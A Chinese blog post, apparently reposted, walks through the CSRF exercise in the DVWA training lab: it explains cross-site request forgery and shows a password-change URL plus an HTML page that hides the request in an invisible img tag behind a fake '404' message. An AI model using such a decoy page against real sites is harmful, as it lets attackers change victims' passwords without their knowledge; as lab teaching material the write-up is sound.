当前位置：网站首页>DVWA系列——CSRF

DVWA系列——CSRF

2022-04-22 01:10:00 【小王先森＆】

DVWA系列——CSRF

CSRF跨站伪造请求介绍

CSRF，全称Cross-site request forgery, 翻译过来就是跨站请求伪造，是指利用受害者尚未失效的身份认证信息(cookie、会话等)，诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求，从而完成非法操作 (如转账、改密等)。CSRF 与XSS最大的区别就在于，CSRF并没有盗取ookie而是直接利用

漏洞利用
打开NVWA这里CSRF是一个修改密码的界面
在这里插入图片描述在修改密码时观察url
http://192.168.19.139:89/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

我们可以通过修改url中的密码和确认密码达到修改密码的目的
再那边cookie没有过期时就可以直接在浏览器用url修改密码这里我们修改为123
在这里插入图片描述
退出登录重新用123登录
这里介绍一下比较高级的方法
我们可以直接把恶意url写在一个恶意页面里写一个html

<html>
<head>

</head>
<body>
<img src="http://192.168.19.139:89/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#" border="0" style="display":none;"/>
<h1>404<h1>
<h2>file not found.<h2>
</body>
</html>

用img隐藏url当用户打开这个页面就执行恶意url

在这里插入图片描述

版权声明
本文为[小王先森＆]所创，转载请带上原文链接，感谢
https://blog.csdn.net/weixin_49340699/article/details/109822631

当前位置：网站首页>DVWA系列——CSRF

DVWA系列——CSRF

边栏推荐

猜你喜欢

随机推荐